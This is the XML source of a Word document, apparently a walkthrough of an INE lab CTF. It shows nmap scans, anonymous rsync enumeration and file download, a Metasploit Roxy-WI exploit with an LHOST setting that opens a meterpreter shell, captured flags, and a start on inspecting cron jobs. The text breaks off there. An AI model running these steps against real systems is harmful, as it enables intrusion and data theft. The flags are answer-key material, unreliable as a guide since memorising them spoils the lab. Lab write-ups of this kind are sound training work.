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91E1" w14:textId="3579097E" w:rsidR="00853ABF" w:rsidRDefault="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host &amp; Network Penetration Testing: The Metasploit Framework CTF 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F8B4F" w14:textId="345555CC" w:rsidR="00A50A00" w:rsidRDefault="00A50A00"/>
    <w:p w14:paraId="0AD258AC" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A074A8" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00A50A00">
        <w:t>In this lab environment, you will have GUI access to a Kali Linux machine. Two machines are accessible at </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target1.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target2.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A83763" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t> Using various exploration techniques, complete the following tasks to capture the associated flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70618915" w14:textId="002802FC" w:rsidR="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t> Enumerate the open port using Metasploit and inspect the RSYNC banner closely; it might reveal something interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE27C86" w14:textId="6AA15C6F" w:rsidR="00A50A00" w:rsidRPr="00980E9E" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00980E9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577D0F00" w14:textId="2004E5EB" w:rsidR="00A50A00" w:rsidRDefault="00980E9E" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00980E9E">
        <w:t> perform the scan using the following command in the terminal: nmap -sC -sV target1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A7250" w14:textId="686FF7E5" w:rsidR="00980E9E" w:rsidRDefault="00980E9E" w:rsidP="00A50A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A85ED3A" wp14:editId="0FEDD461">
            <wp:extent cx="5943600" cy="2107565"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="2101386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6741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5C4" w14:textId="04CCEE7D" w:rsidR="00980E9E" w:rsidRDefault="00980E9E" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00980E9E">
        <w:t>Only one port is open, which is RSYNC</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE6754D" w14:textId="77777777" w:rsidR="00980E9E" w:rsidRDefault="00980E9E" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00980E9E">
        <w:t> connect to RSYNC</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7EB60" w14:textId="1B005B86" w:rsidR="00980E9E" w:rsidRDefault="00980E9E" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00980E9E">
        <w:t>rsync rsync://target1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A7A43" w14:textId="646EC3C3" w:rsidR="00980E9E" w:rsidRDefault="00980E9E" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00980E9E">
        <w:t> List the available RSYNC modules on the server target1.ine.local. It will display all the directories or shares that are accessible via RSYNC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063E3192" w14:textId="7BE84014" w:rsidR="00980E9E" w:rsidRDefault="00673287" w:rsidP="00A50A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17EF3DD3" wp14:editId="6438661A">
            <wp:extent cx="4946904" cy="692186"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1864873747" name="Picture 2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3747" name="Picture 2" descr="A close up of a numb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8B06" w14:textId="1FCFAC11" w:rsidR="00673287" w:rsidRDefault="00673287" w:rsidP="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673287">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FLAG1_934152889d064e10a12b27de0f9c3297</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C84B8BB" w14:textId="4F4CF994" w:rsidR="00673287" w:rsidRPr="00673287" w:rsidRDefault="00673287" w:rsidP="00A50A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0F8B37" wp14:editId="6590F47B">
            <wp:extent cx="4400776" cy="774740"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="196545057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50575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8FA" w14:textId="25785FE5" w:rsidR="00A50A00" w:rsidRPr="00980E9E" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00980E9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D478A8" w14:textId="390B9FDE" w:rsidR="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RSYNC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve"> stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Remote Synchronization"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62B442" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA269D" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve">It compares files on </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>source and destination</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve"> systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67981852" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve">Only </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>differences (deltas)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve"> are transferred — not the whole file — making it </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fast and bandwidth-efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E9DFF9" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve">Commonly used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>backups, mirroring, and deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE2E91F" w14:textId="7215E286" w:rsidR="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>publicly accessible rsync daemon</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve"> that may allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anonymous file access</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data leakage</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t xml:space="preserve"> if misconfigured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390F9CC3" w14:textId="77777777" w:rsidR="00980E9E" w:rsidRPr="00A50A00" w:rsidRDefault="00980E9E" w:rsidP="00A50A00"/>
    <w:p w14:paraId="68D4ECB4" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t> The files on the RSYNC server hold valuable information. Explore the contents to find the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26533FC6" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00D872B4" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D872B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D2B97" w14:textId="77777777" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00D872B4">
        <w:t>rsync rsync://target1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C26060" w14:textId="3A2ABE3B" w:rsidR="00A50A00" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r>
        <w:t>give us</w:t>
      </w:r>
      <w:r w:rsidRPr="00D872B4">
        <w:t xml:space="preserve"> a module named backupwscohen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E4A14" w14:textId="44CEA28E" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00D872B4">
        <w:t> check the contents of that module</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C2C0F" w14:textId="0B41203C" w:rsidR="00A50A00" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00D872B4">
        <w:t>rsync rsync://target1.ine.local/backupwscohen/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2EC006" w14:textId="705373E8" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9272D5" wp14:editId="38B09618">
            <wp:extent cx="5562886" cy="1079555"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="6177845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84580" name="Picture 6177845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1FB" w14:textId="348BC142" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00D872B4">
        <w:t>rsync -av rsync://target1.ine.local/backupwscohen/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B214148" w14:textId="77777777" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00D872B4">
        <w:t>This command downloads all files from the backupwscohen module on the remote server target1.ine.local to the current local directory (.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F54680" w14:textId="115295F2" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00D872B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>archive mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00D872B4">
        <w:t> (-a) to preserve file properties</w:t>
      </w:r>
      <w:r w:rsidR="001B5CF4" w:rsidRPr="001B5CF4">
        <w:t xml:space="preserve"> and copies directories recursively</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F22FAD" w14:textId="2E204B4B" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00D872B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> verbose mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00D872B4">
        <w:t> (-v) for detailed output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653758E3" w14:textId="504B643E" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77517763" wp14:editId="0F8803B3">
            <wp:extent cx="5232669" cy="2565532"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="587199046" name="Picture 17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9046" name="Picture 17" descr="A computer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50B3" w14:textId="65B00A16" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r>
        <w:t>One by one open the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B587A16" w14:textId="228B60A9" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58080271" wp14:editId="36334093">
            <wp:extent cx="4007056" cy="1854295"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1940730266" name="Picture 18" descr="A computer screen with white text and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0266" name="Picture 18" descr="A computer screen with white text and red lett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306" w14:textId="74795ACC" w:rsidR="00D872B4" w:rsidRDefault="00D872B4" w:rsidP="00A50A00">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D872B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FLAG2_15e186ce067c43fc944fa9a1ff5a78ee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B795E" w14:textId="3E3E042E" w:rsidR="00D872B4" w:rsidRPr="00A50A00" w:rsidRDefault="00D872B4" w:rsidP="00A50A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3325BC" wp14:editId="7FC6860C">
            <wp:extent cx="4305521" cy="781090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="619430912" name="Picture 19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0912" name="Picture 19" descr="A blue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9BD1" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t> Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF18BD" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4E135" w14:textId="11E99CF4" w:rsidR="00A50A00" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="001B5CF4">
        <w:t>we start with an Nmap scan</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A5933" w14:textId="2C6EB285" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="001B5CF4">
        <w:t>nmap -sC -sV target2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A6EF8" w14:textId="2185E3A8" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287B5ACE" wp14:editId="52211211">
            <wp:extent cx="5943600" cy="4049395"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="20150973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7348" name="Picture 20150973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57F2" w14:textId="77777777" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="001B5CF4">
        <w:t> Roxy-WI is running on the web server. Let's check if there is an exploit available for it in Metasploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5987D8" w14:textId="47BD3BAA" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A43FA4" w14:textId="4214DFDE" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r>
        <w:t>Search ROXY-WI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3702880E" w14:textId="2D373B8F" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF4A0C3" wp14:editId="029C81F0">
            <wp:extent cx="5943600" cy="4039870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19827478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47847" name="Picture 19827478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6F44" w14:textId="589D39AD" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r w:rsidRPr="001B5CF4">
        <w:t>we have found an exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41EBCF" w14:textId="5942BE15" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r>
        <w:t>select it use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D740371" w14:textId="3F23C672" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="00A50A00">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B373C54" w14:textId="77777777" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="001B5CF4">
      <w:r>
        <w:t>set RHOSTS target2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A7AAC" w14:textId="4824268A" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="001B5CF4">
      <w:r>
        <w:t>set LHOST 192.220.38.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616708E7" w14:textId="48CD7E07" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="001B5CF4">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75932B" w14:textId="229A8D4B" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="001B5CF4">
      <w:r>
        <w:t>and we get the meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7942ABFF" w14:textId="61A41205" w:rsidR="001B5CF4" w:rsidRDefault="001B5CF4" w:rsidP="001B5CF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E543C4E" wp14:editId="56EB04B8">
            <wp:extent cx="5943600" cy="2877820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2026406456" name="Picture 2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6456" name="Picture 22" descr="A computer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C05F" w14:textId="53D4FD27" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r>
        <w:t>Now,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAC380" w14:textId="4CE4F0DA" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r w:rsidRPr="00712F97">
        <w:t>switch to a shell by using the shell command. To make it more interactive, type: /bin/bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555B7AAD" w14:textId="314BABAF" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0629B9" wp14:editId="7D2A12A7">
            <wp:extent cx="5943600" cy="1136015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="142425772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5772" name="Picture 2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ABDB" w14:textId="77777777" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r w:rsidRPr="00712F97">
        <w:t>navigate to the root directory by using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A422C" w14:textId="0BD7F437" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r w:rsidRPr="00712F97">
        <w:t> cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7B3CCA" w14:textId="2B85A0B7" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214F6155" w14:textId="5D2CF39B" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="208A663D" wp14:editId="6087116D">
            <wp:extent cx="4407126" cy="3962604"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107137671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6711" name="Picture 2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573A" w14:textId="1F4BD597" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r>
        <w:t>Cat  flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F56FBD" w14:textId="50C04024" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A6980DD" wp14:editId="1AD57377">
            <wp:extent cx="5442230" cy="520727"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="8883912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1229" name="Picture 8883912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421" w14:textId="7A8E1E4A" w:rsidR="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712F97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FLAG3_aa697fc03c2a48708aaf0e0bce3eabc7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7DCEC7" w14:textId="1AA55706" w:rsidR="00712F97" w:rsidRPr="00712F97" w:rsidRDefault="00712F97" w:rsidP="001B5CF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08357B" wp14:editId="544DEBBF">
            <wp:extent cx="4438878" cy="622332"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="858433932" name="Picture 26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3932" name="Picture 26" descr="A close up of a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8660" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00A50A00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50A00">
        <w:t> Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADBE92F" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D56F7" w14:textId="2546423E" w:rsidR="00A50A00" w:rsidRDefault="00307D13" w:rsidP="00A50A00">
      <w:r w:rsidRPr="00307D13">
        <w:t>automated tasks, it points to cron jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AE0050" w14:textId="77777777" w:rsidR="00307D13" w:rsidRDefault="00307D13" w:rsidP="00307D13">
      <w:r w:rsidRPr="00307D13">
        <w:t>The default cron jobs are located in the /etc directory. Let’s navigate to that directory using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04125F81" w14:textId="494ED840" w:rsidR="00307D13" w:rsidRPr="00307D13" w:rsidRDefault="00307D13" w:rsidP="00307D13">
      <w:r w:rsidRPr="00307D13">
        <w:t> cd etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE67E87" w14:textId="77777777" w:rsidR="00307D13" w:rsidRPr="00307D13" w:rsidRDefault="00307D13" w:rsidP="00307D13">
      <w:r w:rsidRPr="00307D13">
        <w:lastRenderedPageBreak/>
        <w:t>Then, use the ls command to list the contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F75BBB" w14:textId="33B04547" w:rsidR="00307D13" w:rsidRDefault="00307D13" w:rsidP="00A50A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C5E89D7" wp14:editId="71F41756">
            <wp:extent cx="5943600" cy="2232025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12534769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690" name="Picture 2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422F" w14:textId="77777777" w:rsidR="00A50A00" w:rsidRPr="00A50A00" w:rsidRDefault="00A50A00" w:rsidP="00A50A00"/>
